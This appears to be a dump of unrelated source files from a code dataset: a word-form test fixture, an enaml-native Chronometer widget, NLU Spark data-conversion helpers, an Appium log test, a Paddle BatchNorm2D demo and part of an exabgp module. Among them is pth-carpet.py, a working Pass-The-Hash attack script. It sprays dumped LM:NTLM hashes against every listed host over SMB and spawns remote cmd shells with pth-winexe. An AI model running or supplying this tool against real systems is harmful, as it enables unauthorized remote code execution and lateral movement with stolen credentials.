"r": {"operatively"},
},
),
(
"invest",
{
"n": {
"investitures",
"investors",
"investiture",
"investor",
"investments",
"investings",
"investment",
"investing",
},
"a": set(),
"v": {"invested", "invests", "invest", "investing"},
"r": set(),
},
),
(
"investments",
{
"n": {
"investitures",
"investors",
"investiture",
"investor",
"investments",
"investings",
"investment",
"investing",
},
"a": set(),
"v": {"invested", "invests", "invest", "investing"},
"r": set(),
},
),
(
"conjugation",
{
"n": {"conjugate", "conjugation", "conjugates", "conjugations"},
"a": {"conjugate"},
"v": {"conjugating", "conjugated", "conjugate", "conjugates"},
"r": set(),
},
),
(
"do",
{
"n": {"does", "doer", "doers", "do"},
"a": set(),
"v": {
"doing",
"don't",
"does",
"didn't",
"do",
"doesn't",
"done",
"did",
},
"r": set(),
},
),
(
"word",
{
"n": {"words", "word", "wordings", "wording"},
"a": set(),
"v": {"words", "word", "worded", "wording"},
"r": set(),
},
),
(
"love",
{
"a": {"lovable", "loveable"},
"n": {"love", "lover", "lovers", "loves"},
"r": set(),
"v": {"love", "loved", "loves", "loving"},
},
),
(
"word",
{
"n": {"words", "word", "wordings", "wording"},
"a": set(),
"v": {"words", "word", "worded", "wording"},
"r": set(),
},
),
(
"verb",
{
"n": {"verbs", "verb"},
"a": {"verbal"},
"v": {"verbifying", "verbified", "verbify", "verbifies"},
"r": {"verbally"},
},
),
(
"genetic",
{
"n": {"geneticist", "genetics", "geneticists", "genes", "gene"},
"a": {"genic", "genetic", "genetical"},
"v": set(),
"r": {"genetically"},
},
),
(
"politician",
{
"r": {"politically"},
"a": {"political"},
"n": {"politician", "politicians", "politics"},
"v": set(),
},
),
(
"death",
{
"n": {"death", "dying", "deaths", "die", "dyings", "dice"},
"a": {"dying", "deathly"},
"v": {"died", "die", "dying", "dies"},
"r": {"deathly"},
},
),
(
"attitude",
{
"n": {"attitudes", "attitude"},
"a": set(),
"v": {
"attitudinise",
"attitudinized",
"attitudinize",
"attitudinizes",
"attitudinizing",
},
"r": set(),
},
),
(
"cheek",
{
"n": {"cheek", "cheekinesses", "cheeks", "cheekiness"},
"a": {"cheeky"},
"v": {"cheek", "cheeks", "cheeked", "cheeking"},
"r": {"cheekily"},
},
),
(
"world",
{
"n": {"worldliness", "world", "worldlinesses", "worlds"},
"a": {"worldly", "world"},
"v": set(),
"r": set(),
},
),
("lake", {"n": {"lake", "lakes"}, "a": set(), "v": set(), "r": set()}),
(
"guitar",
{
"n": {"guitarist", "guitarists", "guitar", "guitars"},
"a": set(),
"v": set(),
"r": set(),
},
),
(
"presence",
{
"n": {
"presenter",
"present",
"presents",
"presentness",
"presenters",
"presentnesses",
"presentments",
"presentations",
"presences",
"presence",
"presentment",
"presentation",
},
"a": {"present"},
"v": {"present", "presents", "presenting", "presented"},
"r": {"presently"},
},
),
(
"enthusiasm",
{
"n": {"enthusiasm", "enthusiasms"},
"a": {"enthusiastic"},
"v": set(),
"r": {"enthusiastically"},
},
),
(
"organization",
{
"n": {"organizers", "organization", "organizations", "organizer"},
"a": set(),
"v": {"organize", "organized", "organizing", "organizes"},
"r": set(),
},
),
(
"player",
{
"n": {
"plays",
"playlet",
"playings",
"players",
"playing",
"playlets",
"play",
"player",
},
"a": set(),
"v": {"plays", "play", "playing", "played"},
"r": set(),
},
),
(
"transportation",
{
"n": {
"transporters",
"transportation",
"transportations",
"transporter",
"transport",
"transports",
},
"a": set(),
"v": {"transport", "transporting", "transports", "transported"},
"r": set(),
},
),
(
"television",
{
"n": {"televisions", "television"},
"a": set(),
"v": {"televising", "televise", "televises", "televised"},
"r": set(),
},
),
(
"cousin",
{"n": {"cousins", "cousin"}, "a": {"cousinly"}, "v": set(), "r": set()},
),
(
"ability",
{"n": {"abilities", "ability"}, "a": {"able"}, "v": set(), "r": {"ably"}},
),
("chapter", {"n": {"chapters", "chapter"}, "a": set(), "v": set(), "r": set()}),
(
"appearance",
{
"n": {
"appearances",
"apparitions",
"appearance",
"apparencies",
"apparentness",
"apparentnesses",
"apparition",
"apparency",
},
"a": {"apparent"},
"v": {"appears", "appeared", "appear", "appearing"},
"r": {"apparently"},
},
),
(
"drawing",
{
"n": {
"drawings",
"drawers",
"draws",
"drawer",
"drawees",
"drawee",
"draw",
"drawing",
},
"a": set(),
"v": {"draws", "drew", "drawn", "draw", "drawing"},
"r": set(),
},
),
(
"university",
{"n": {"university", "universities"}, "a": set(), "v": set(), "r": set()},
),
(
"performance",
{
"n": {
"performings",
"performing",
"performances",
"performance",
"performer",
"performers",
},
"a": set(),
"v": {"performs", "performing", "performed", "perform"},
"r": set(),
},
),
("revenue", {"n": {"revenue", "revenues"}, "a": set(), "v": set(), "r": set()}),
# Some Verbs
(
"cling",
{
"n": {"cling", "clings"},
"a": set(),
"v": {"clung", "cling", "clinging", "clings"},
"r": set(),
},
),
(
"decrease",
{
"n": {"decrease", "decreases"},
"a": set(),
"v": {"decrease", "decreases", "decreased", "decreasing"},
"r": set(),
},
),
(
"wonder",
{
"n": {
"wonder",
"wonderment",
"wonderments",
"wonders",
"wonderers",
"wonderer",
},
"a": {"wondrous"},
"v": {"wondering", "wonder", "wonders", "wondered"},
"r": {"wondrous", "wondrously"},
},
),
(
"rest",
{
"n": {"rest", "rests", "resters", "rester"},
"a": set(),
"v": {"rest", "rests", "resting", "rested"},
"r": set(),
},
),
(
"mutter",
{
"n": {
"mutterer",
"mutterers",
"muttering",
"mutter",
"mutterings",
"mutters",
},
"a": set(),
"v": {"muttering", "muttered", "mutters", "mutter"},
"r": set(),
},
),
(
"implement",
{
"n": {"implementations", "implement", "implements", "implementation"},
"a": {"implemental"},
"v": {"implemented", "implement", "implements", "implementing"},
"r": set(),
},
),
(
"evolve",
{
"n": {"evolution", "evolutions"},
"a": {"evolutionary"},
"v": {"evolved", "evolve", "evolves", "evolving"},
"r": {"evolutionarily"},
},
),
(
"allocate",
{
"n": {"allocations", "allocators", "allocation", "allocator"},
"a": {"allocable", "allocatable"},
"v": {"allocating", "allocates", "allocated", "allocate"},
"r": set(),
},
),
(
"flood",
{
"n": {"flood", "flooding", "floodings", "floods"},
"a": set(),
"v": {"flooding", "flooded", "flood", "floods"},
"r": set(),
},
), # Should there be `flooded` in 'a' here?
(
"bow",
{
"n": {"bows", "bow"},
"a": set(),
"v": {"bows", "bowing", "bowed", "bow"},
"r": set(),
},
),
(
"advocate",
{
"n": {
"advocates",
"advocator",
"advocacy",
"advocacies",
"advocators",
"advocate",
},
"a": set(),
"v": {"advocates", "advocating", "advocated", "advocate"},
"r": set(),
},
),
(
"divert",
{
"n": {"diversions", "diversionists", "diversionist", "diversion"},
"a": {"diversionary"},
"v": {"diverted", "diverts", "divert", "diverting"},
"r": set(),
},
),
# Some adjectives
(
"sweet",
{
"n": {"sweetnesses", "sweets", "sweetness", "sweet"},
"a": {"sweet"},
"v": set(),
"r": {"sweet", "sweetly"},
},
),
(
"glossy",
{
"n": {"glossiness", "glossy", "glossies", "glossinesses"},
"a": {"glossy"},
"v": set(),
"r": {"glossily"},
},
),
(
"relevant",
{
"n": {"relevancies", "relevance", "relevancy", "relevances"},
"a": {"relevant"},
"v": set(),
"r": {"relevantly"},
},
),
(
"aloof",
{"n": {"aloofnesses", "aloofness"}, "a": {"aloof"}, "v": set(), "r": {"aloof"}},
),
(
"therapeutic",
{
"n": {
"therapists",
"therapies",
"therapy",
"therapist",
"therapeutic",
"therapeutics",
},
"a": {"therapeutical", "therapeutic"},
"v": set(),
"r": {"therapeutically"},
},
),
(
"obviously",
{
"n": {"obviousnesses", "obviousness"},
"a": {"obvious"},
"v": set(),
"r": {"obviously"},
},
),
(
"jumpy",
{
"n": {"jumpings", "jumpiness", "jumpinesses", "jump", "jumping", "jumps"},
"a": {"jumpy"},
"v": {"jump", "jumping", "jumped", "jumps"},
"r": set(),
},
),
(
"venomous",
{"n": {"venom", "venoms"}, "a": {"venomous"}, "v": set(), "r": {"venomously"}},
),
(
"laughable",
{
"n": {"laugher", "laughs", "laughers", "laugh"},
"a": {"laughable"},
"v": {"laughing", "laughs", "laughed", "laugh"},
"r": {"laughably"},
},
),
(
"demonic",
{
"n": {"demons", "demon", "demonizations", "demonization"},
"a": {"demonic"},
"v": {"demonized", "demonizing", "demonizes", "demonize"},
"r": set(),
},
),
(
"knotty",
{
"n": {"knot", "knottiness", "knots", "knottinesses"},
"a": {"knotty"},
"v": {"knotted", "knotting", "knots", "knot"},
"r": set(),
},
), # Is `knottinesses` a valid plural?
(
"little",
{
"n": {"little", "littlenesses", "littles", "littleness"},
"a": {"little"},
"v": set(),
"r": {"little"},
},
), # Is `littlenesses` a valid plural?
(
"puzzling",
{
"n": {
"puzzle",
"puzzlers",
"puzzler",
"puzzlement",
"puzzlements",
"puzzles",
},
"a": {"puzzling"},
"v": {"puzzle", "puzzled", "puzzles", "puzzling"},
"r": set(),
},
),
(
"overrated",
{
"n": {"overratings", "overrating"},
"a": set(),
"v": {"overrated", "overrating", "overrate", "overrates"},
"r": set(),
},
),
(
"walk",
{
"n": {"walking", "walks", "walkings", "walker", "walk", "walkers"},
"a": {"walking"},
"v": {"walked", "walking", "walk", "walks"},
"r": set(),
},
),
(
"walking",
{
"n": {"walking", "walks", "walkings", "walker", "walk", "walkers"},
"a": {"walking"},
"v": {"walked", "walking", "walk", "walks"},
"r": set(),
},
),
(
"be",
{
"n": {"beings", "being"},
"a": set(),
"v": {
"wasn't",
"being",
"be",
"are",
"was",
"am",
"isn't",
"is",
"aren't",
"been",
"weren't",
"were",
"am not",
},
"r": set(),
},
),
(
"am",
{
"n": {"beings", "being"},
"a": set(),
"v": {
"wasn't",
"being",
"be",
"are",
"was",
"am",
"isn't",
"is",
"aren't",
"been",
"weren't",
"were",
"am not",
},
"r": set(),
},
),
(
"run",
{
"n": {
"runnings",
"run",
"runninesses",
"runner",
"runniness",
"running",
"runs",
"runners",
},
"a": {"running", "runny"},
"v": {"running", "ran", "run", "runs"},
"r": set(),
},
),
(
"ran",
{
"n": {
"runnings",
"run",
"runninesses",
"runner",
"runniness",
"running",
"runs",
"runners",
},
"a": {"running", "runny"},
"v": {"running", "ran", "run", "runs"},
"r": set(),
},
),
(
"blanket",
{
"n": {"blanket", "blankets"},
"a": {"blanket"},
"v": {"blankets", "blanketed", "blanketing", "blanket"},
"r": set(),
},
),
] |
src/enamlnative/widgets/chronometer.py | codelv/enaml-native | 237 | 12664721 | <reponame>codelv/enaml-native
"""
Copyright (c) 2017, <NAME>.
Distributed under the terms of the MIT License.
The full license is in the file LICENSE, distributed with this software.
Created on May 20, 2017
@author: jrm
"""
from atom.api import (
Typed, ForwardTyped, Long, Str, Enum, Bool, observe, set_default
)
from datetime import datetime
from enaml.core.declarative import d_
from .text_view import TextView, ProxyTextView
class ProxyChronometer(ProxyTextView):
""" The abstract definition of a proxy Chronometer object.
"""
    #: A reference to the Chronometer declaration.
declaration = ForwardTyped(lambda: Chronometer)
def set_base(self, base):
raise NotImplementedError
def set_format(self, format):
raise NotImplementedError
def set_direction(self, direction):
raise NotImplementedError
def set_running(self, running):
raise NotImplementedError
def set_mode(self, mode):
raise NotImplementedError
class Chronometer(TextView):
""" A simple control for displaying read-only text.
"""
#: Set the time that the count-up timer is in reference to.
base = d_(Typed(datetime, factory=datetime.now))
#: Tick counter
ticks = d_(Long(), writable=False)
#: Sets the format string used for display.
format = d_(Str())
#: Counting direction
direction = d_(Enum('up', 'down'))
#: Defines the behavior when restarting
#: If mode is resume it will continue otherwise
#: it will reset the count.
mode = d_(Enum('resume', 'reset', 'manual'))
#: Start / stop the counter
running = d_(Bool())
    #: A reference to the ProxyChronometer object.
proxy = Typed(ProxyChronometer)
@observe('base', 'direction', 'format', 'running', 'mode')
def _update_proxy(self, change):
""" An observer which sends the state change to the proxy.
"""
# The superclass implementation is sufficient.
super(Chronometer, self)._update_proxy(change)
|
nlu/pipe/utils/data_conversion_utils.py | milyiyo/nlu | 480 | 12664725 | <reponame>milyiyo/nlu<gh_stars>100-1000
"""Get data into JVM for prediction and out again as Spark Dataframe"""
import logging
logger = logging.getLogger('nlu')
import pyspark
from pyspark.sql.functions import monotonically_increasing_id
import numpy as np
import pandas as pd
from pyspark.sql.types import StringType, StructType, StructField
class DataConversionUtils():
    # Modin as well, but optional, so we don't import the type yet
supported_types = [pyspark.sql.DataFrame, pd.DataFrame, pd.Series, np.ndarray]
@staticmethod
def except_text_col_not_found(cols):
print(
            f'Could not find a column named "text" in the input Pandas Dataframe. Please ensure a column with that name exists. Columns in DF are: {cols}')
@staticmethod
def sdf_to_sdf(data, spark_sess, raw_text_column='text'):
"""No casting, Spark to Spark. Just add index col"""
output_datatype = 'spark'
data = data.withColumn('origin_index', monotonically_increasing_id().alias('origin_index'))
stranger_features = []
if raw_text_column in data.columns:
# store all stranger features
if len(data.columns) > 1:
stranger_features = list(set(data.columns) - set(raw_text_column))
else:
DataConversionUtils.except_text_col_not_found(data.columns)
return data, stranger_features, output_datatype
@staticmethod
def pdf_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting pandas to spark and add index col"""
output_datatype = 'pandas'
stranger_features = []
sdf = None
# set first col as text column if there is none
if raw_text_column not in data.columns: data.rename(columns={data.columns[0]: 'text'}, inplace=True)
data['origin_index'] = data.index
if raw_text_column in data.columns:
if len(data.columns) > 1:
# make Nans to None, or spark will crash
data = data.where(pd.notnull(data), None)
data = data.dropna(axis=1, how='all')
stranger_features = list(set(data.columns) - set(raw_text_column))
sdf = spark_sess.createDataFrame(data)
else:
DataConversionUtils.except_text_col_not_found(data.columns)
return sdf, stranger_features, output_datatype
@staticmethod
def pds_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting pandas series to spark and add index col. # for df['text'] colum/series passing casting follows pseries->pdf->spark->pd """
output_datatype = 'pandas_series'
sdf = None
schema = StructType([StructField(raw_text_column, StringType(), True)])
data = pd.DataFrame(data).dropna(axis=1, how='all')
# If series from a column is passed, its column name will be reused.
if raw_text_column not in data.columns and len(data.columns) == 1:
data[raw_text_column] = data[data.columns[0]]
else:
logger.info(
                f'INFO: NLU will assume {data.columns[0]} as the label column since the default text column could not be found')
data[raw_text_column] = data[data.columns[0]]
data['origin_index'] = data.index
if raw_text_column in data.columns:
sdf = spark_sess.createDataFrame(pd.DataFrame(data[raw_text_column]), schema=schema)
else:
DataConversionUtils.except_text_col_not_found(data.columns)
if 'origin_index' not in sdf.columns:
sdf = sdf.withColumn('origin_index', monotonically_increasing_id().alias('origin_index'))
return sdf, [], output_datatype
@staticmethod
def np_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting numpy array to spark and add index col. This is a bit inefficient. Casting follow np->pd->spark->pd. We could cut out the first pd step """
output_datatype = 'numpy_array'
        if len(data.shape) != 1:
            raise ValueError(
                f"Exception: Input numpy array must be 1 dimensional for prediction. Input data shape is {data.shape}")
sdf = spark_sess.createDataFrame(pd.DataFrame({raw_text_column: data, 'origin_index': list(range(len(data)))}))
return sdf, [], output_datatype
@staticmethod
def str_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting str to spark and add index col. This is a bit inefficient. Casting follow # inefficient, str->pd->spark->pd , we can could first pd"""
output_datatype = 'string'
sdf = spark_sess.createDataFrame(pd.DataFrame({raw_text_column: data, 'origin_index': [0]}, index=[0]))
return sdf, [], output_datatype
@staticmethod
def str_list_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting str list to spark and add index col. This is a bit inefficient. Casting follow # # inefficient, list->pd->spark->pd , we can could first pd"""
output_datatype = 'string_list'
if all(type(elem) == str for elem in data):
sdf = spark_sess.createDataFrame(
pd.DataFrame({raw_text_column: pd.Series(data), 'origin_index': list(range(len(data)))}))
else:
ValueError("Exception: Not all elements in input list are of type string.")
return sdf, [], output_datatype
@staticmethod
def fallback_modin_to_sdf(data, spark_sess, raw_text_column='text'):
"""Casting potential Modin data to spark and add index col. # Modin tests, This could crash if Modin not installed """
sdf = None
output_datatype = ''
try:
import modin.pandas as mpd
if isinstance(data, mpd.DataFrame):
data = pd.DataFrame(data.to_dict()) # create pandas to support type inference
output_datatype = 'modin'
data['origin_index'] = data.index
if raw_text_column in data.columns:
if len(data.columns) > 1:
data = data.where(pd.notnull(data), None) # make Nans to None, or spark will crash
data = data.dropna(axis=1, how='all')
stranger_features = list(set(data.columns) - set(raw_text_column))
sdf = spark_sess.createDataFrame(data)
else:
DataConversionUtils.except_text_col_not_found(data.columns)
if isinstance(data, mpd.Series):
output_datatype = 'modin_series'
data = pd.Series(data.to_dict()) # create pandas to support type inference
data = pd.DataFrame(data).dropna(axis=1, how='all')
data['origin_index'] = data.index
index_provided = True
if raw_text_column in data.columns:
sdf = spark_sess.createDataFrame(data[['text']])
else:
DataConversionUtils.except_text_col_not_found(data.columns)
except:
print(
"If you use Modin, make sure you have installed 'pip install modin[ray]' or 'pip install modin[dask]' backend for Modin ")
return sdf, [], output_datatype
@staticmethod
def to_spark_df(data, spark_sess, raw_text_column='text'):
"""Convert supported datatypes to SparkDF and extract extra data for prediction later on."""
try:
if isinstance(data, pyspark.sql.dataframe.DataFrame):
return DataConversionUtils.sdf_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, pd.DataFrame):
return DataConversionUtils.pdf_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, pd.Series):
return DataConversionUtils.pds_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, np.ndarray):
return DataConversionUtils.np_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, str):
return DataConversionUtils.str_to_sdf(data, spark_sess, raw_text_column)
elif isinstance(data, list):
return DataConversionUtils.str_list_to_sdf(data, spark_sess, raw_text_column)
else:
return DataConversionUtils.fallback_modin_to_sdf(data, spark_sess, raw_text_column)
        except Exception:
            raise ValueError("Data could not be converted to Spark Dataframe for internal conversion.")
|
hard-gists/3018bf3643f80798bde75c17571a38a9/snippet.py | jjhenkel/dockerizeme | 1,139 | 12664730 | <filename>hard-gists/3018bf3643f80798bde75c17571a38a9/snippet.py
#!/usr/bin/python
#
# Simple script intended to perform carpet bombing against a list
# of provided machines using a list of provided LSA hashes (LM:NTLM).
# The basic idea of a Pass-The-Hash attack is to take one hash and use it
# against one machine. The problem with that approach is not knowing
# in advance which machine the hash can be applied to.
# This script was written to address that issue.
#
# Requirements:
# This script requires the 'pth-winexe' utility (or winexe renamed to 'pth-winexe') to be present
# on the system when the script is invoked. If this utility is not present,
# no further check of the ability to run commands via the PTH attack will be displayed.
# Also, modules such as:
# - impacket
#
# Notice:
# This script can only verify the exploitability of Windows boxes. For
# other types of boxes (running Samba), pth-winexe will not yield satisfying results.
#
# Usage:
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# <NAME>., 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
#
from __future__ import print_function
import os
import sys
import argparse
import signal
import logging
import threading
import subprocess
import multiprocessing
from termcolor import colored
from functools import partial
from multiprocessing.managers import BaseManager
from impacket.dcerpc.v5 import transport
WORKERS = multiprocessing.cpu_count() * 4
TIMEOUT = 10
OPTIONS = None
LOCK = multiprocessing.Lock()
def info(txt):
with LOCK:
print (txt)
def success(txt):
info(colored('[+] '+txt, 'green', attrs=['bold']))
def warning(txt):
info(colored('[*] '+txt, 'yellow'))
def verbose(txt):
if OPTIONS.v:
info(colored('[?] '+txt, 'white'))
def err(txt):
info(colored('[!] '+txt, 'red'))
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ''
self.error = ''
verbose( '\tCalling: "%s"' % cmd)
def get_output(self):
return self.output, self.error
def run(self, stdin, timeout):
def target():
self.process = subprocess.Popen(self.cmd, shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
self.output, self.error = self.process.communicate(stdin)
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return False
else:
return True
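# A minimal sketch of how Command is used (mirrors the pth-winexe call in
# check_rce below); 'echo hello' is an illustrative command, not part of the tool:
#
#     c = Command('echo hello')
#     if c.run(stdin='', timeout=5):
#         out, err = c.get_output()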
def init_worker():
# http://stackoverflow.com/a/6191991
signal.signal(signal.SIGINT, signal.SIG_IGN)
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def check_rce(host, username, hash, port):
verbose('\tChecking whether provided hash can be used to PTH remote code execution')
if cmd_exists('pth-winexe'):
userswitch = '%s%%%s' % (username, hash)
c = Command('pth-winexe -U %s //%s cmd' % (userswitch, host))
if c.run('exit\n', TIMEOUT):
pass
else:
verbose('\tPTH-Winexe had to be terminated.')
out, error = c.get_output()
if 'Microsoft' in out and '(C) Copyright' in out and '[Version' in out:
return True
else:
errorm = error[error.find('NT_STATUS'):].strip()
if not errorm.startswith('NT_STATUS'):
if 'NT_STATUS' in error:
errorm = error
else:
errorm = 'Unknown error'
if OPTIONS.v:
err('\tCould not spawn shell using PTH: ' + errorm)
else:
warning('\tPlease check above hash whether using it you can access writeable $IPC share to execute cmd.')
return False
def login(host, username, hash, port):
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % host
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
lmhash, nthash = hash.split(':')
rpctransport.set_credentials(username, '', '', lmhash, nthash, None)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
return check_rce(host, username, hash, port)
except Exception, e:
raise e
def correct_hash(hash):
lmhash, nthash = hash.split(':')
if '*' in lmhash:
lmhash = '0' * 32
if '*' in nthash:
nthash = '0' * 32
return lmhash + ':' + nthash
def worker(stopevent, pwdump, machine):
for user, hash in pwdump.items():
if stopevent.is_set():
break
hash = correct_hash(hash)
try:
if login(machine, user, hash, OPTIONS.port):
success('Pass-The-Hash with shell spawned: %s@%s (%s)' % (user, machine, hash))
else:
if OPTIONS.v:
                    warning('Connected using PTH but couldn\'t spawn shell: %s@%s (%s)' % (user, machine, hash))
except Exception, e:
verbose('Hash was not accepted: %s@%s (%s)\n\t%s' % (user, machine, hash, str(e)))
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\t<NAME>., 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
parser.add_argument('hashes', nargs='?', help='Specifies input file containing list of dumped hashes in pwdump format')
parser.add_argument('-v', action='store_true', help='Verbose mode')
parser.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar='smb port', help='Destination port used to connect into SMB Server')
if len(sys.argv) < 3:
parser.print_help()
sys.exit(1)
OPTIONS = parser.parse_args()
machines = [x.strip() for x in open(OPTIONS.rhosts).readlines() ]
rawpwdump = [x.strip() for x in open(OPTIONS.hashes).readlines() ]
pwdump = {}
for p in rawpwdump:
try:
user = p.split(':')[0]
hash = p.split(':')[2] + ':' + p.split(':')[3]
except:
err('Supplied hashes file does not conform PWDUMP format!')
err('\tIt must be like this: <user>:<id>:<lmhash>:<nthash>:...')
sys.exit(1)
pwdump[user] = hash
    warning('Testing %d hashes against %d machines, resulting in %d PTH attempts in total\n' \
% (len(pwdump), len(machines), len(pwdump) * len(machines)))
stopevent = multiprocessing.Manager().Event()
try:
pool = multiprocessing.Pool(WORKERS, init_worker)
func = partial(worker, stopevent, pwdump)
pool.map_async(func, machines)
pool.close()
pool.join()
except KeyboardInterrupt:
pool.terminate()
pool.join()
success('\nUser interrupted the script.')
if __name__ == '__main__':
main() |
test/unit/webdriver/log_test.py | appium/python-clien | 1,383 | 12664744 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import httpretty
from appium.webdriver.webdriver import WebDriver
from test.unit.helper.test_helper import appium_command, get_httpretty_request_body, ios_w3c_driver
class TestWebDriverLog(object):
@httpretty.activate
def test_get_log_types(self):
driver = ios_w3c_driver()
httpretty.register_uri(
httpretty.GET,
appium_command('/session/1234567890/log/types'),
body=json.dumps({'value': ['syslog']}),
)
log_types = driver.log_types
assert log_types == ['syslog']
@httpretty.activate
def test_get_log(self):
driver = ios_w3c_driver()
httpretty.register_uri(
httpretty.POST,
appium_command('/session/1234567890/log'),
body=json.dumps({'value': ['logs as array']}),
)
log_types = driver.get_log('syslog')
assert log_types == ['logs as array']
d = get_httpretty_request_body(httpretty.last_request())
assert {'type': 'syslog'} == d
|
junior_class/chapter-3-Computer_Vision/code/CNN_Basis/BatchNorm2D.py | wwhio/awesome-DeepLearning | 1,150 | 12664752 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
Example of batch normalization when the input data shape is [N, C, H, W]
'''
import numpy as np
import paddle
from paddle.nn import BatchNorm2D
# Set the random seed so that every run produces the same result
np.random.seed(100)
# Create the input data
data = np.random.rand(2, 3, 3, 3).astype('float32')
# Use BatchNorm2D to compute the normalized output
# The input data dimensions are [N, C, H, W]; num_features equals C
bn = BatchNorm2D(num_features=3)
x = paddle.to_tensor(data)
y = bn(x)
print('input of BatchNorm2D Layer: \n {}'.format(x.numpy()))
print('output of BatchNorm2D Layer: \n {}'.format(y.numpy()))
# Take the channel-0 slice of data and
# use numpy to compute the mean, std, and the normalized output
a = data[:, 0, :, :]
a_mean = a.mean()
a_std = a.std()
b = (a - a_mean) / a_std
print('channel 0 of input data: \n {}'.format(a))
print('std {}, mean {}, \n output: \n {}'.format(a_mean, a_std, b))
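# As a sanity check (a minimal sketch, assuming BatchNorm2D's small default epsilon
# can be ignored), channel 0 of the layer output should be close to b:
#     np.testing.assert_allclose(b, y.numpy()[:, 0, :, :], rtol=1e-3, atol=1e-3)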
|
cook/core/rules.py | jachris/cook | 130 | 12664761 | <reponame>jachris/cook<filename>cook/core/rules.py
import functools
import os
import traceback
from . import graph, misc, system
def rule(func):
"""Create a new rule. Calling it will be spawning a task.
This function should be used as a decorator. The passed function
must be a generator which follows the protocol.
"""
return functools.partial(graph.spawn_task, func)
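# A minimal sketch of a rule, assuming the generator protocol implied by
# publish() below (yield the published task description first, then run the
# recipe); `copy_file`, `src` and `dst` are illustrative names only:
#
#     @rule
#     def copy_file(src, dst):
#         yield publish(inputs=[src], message='COPY ' + dst, outputs=[dst])
#         shutil.copy(src, dst)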
def task(func):
return graph.spawn_task(func)
def publish(
inputs=None, message=None, outputs=None, check=None, force=False,
result=None, phony=False
):
"""Inform the system about the task."""
if inputs is None:
inputs = set()
elif isinstance(inputs, str):
raise TypeError(
'Inputs is a string\n\n'
'Rules must publish inputs in the form of an iterable. Wrap the '
'string in a list to resolve this issue.'
)
else:
inputs = set(map(os.path.abspath, inputs))
for input in inputs:
if not os.path.isfile(input) and not graph.has_file(input):
raise FileNotFoundError(input)
if not isinstance(message, str):
if message is None:
raise ValueError(
'Publication did not include a message\n\n'
'Every rule must publish a message, even phony ones.'
)
else:
raise TypeError(
'Supplied message is not a string\n\n'
'Every rule must publish a message in form of a string. No '
'implicit conversion is done.'
)
if not outputs:
raise ValueError(
'Rule did not declare any outputs\n\n'
'Every rule, including phony ones, must have at least 1 output.'
)
elif isinstance(outputs, str):
raise TypeError(
'Outputs is a string\n\n'
'Rules must publish outputs in the form of an iterable. Wrap the '
'string in a list to resolve this issue.'
)
else:
outputs = set(map(os.path.abspath, outputs))
for output in outputs:
if graph.has_file(output):
raise ValueError('output collision')
# elif not phony and not misc.is_inside(output, system.build('.')):
# raise ValueError('output outside of build directory')
if not isinstance(result, dict):
if result is None:
result = {}
else:
raise TypeError('result must be of type dict')
elif 'outputs' in result:
raise ValueError('outputs is reserved')
elif 'inputs' in result:
raise ValueError('inputs is reserved')
result['outputs'] = outputs
result['inputs'] = inputs
if len(outputs) == 1 and 'output' not in result:
[output] = outputs
result['output'] = output
in_files = set()
for input in inputs:
file = graph.get_file(input)
if file.producer is None:
file.stat_if_necessary()
if not file.exists:
raise FileNotFoundError(file.path)
in_files.add(file)
out_files = set()
for output in outputs:
file = graph.new_file(output)
out_files.add(file)
if not isinstance(phony, bool):
raise TypeError('phony must be a boolean')
stack = traceback.extract_stack()[:-3]
return in_files, message, out_files, check, force, result, phony, stack
def deposit(inputs=(), warnings=None):
"""Inform the system of additional inputs after execution."""
if isinstance(inputs, str):
raise TypeError('inputs must not be string')
else:
deposits = {os.path.abspath(path) for path in inputs}
for path in deposits:
if not os.path.isfile(path):
raise FileNotFoundError(path)
elif misc.is_inside(path, system.build('.')):
raise ValueError('deposit inside build directory')
if warnings is not None:
warnings = warnings.strip()
return deposits, warnings
|
src/exabgp/reactor/api/command/announce.py | pierky/exabgp | 1,560 | 12664774 | # encoding: utf-8
"""
announce.py
Created by <NAME> on 2017-07-01.
Copyright (c) 2009-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
from exabgp.reactor.api.command.command import Command
from exabgp.reactor.api.command.limit import match_neighbors
from exabgp.reactor.api.command.limit import extract_neighbors
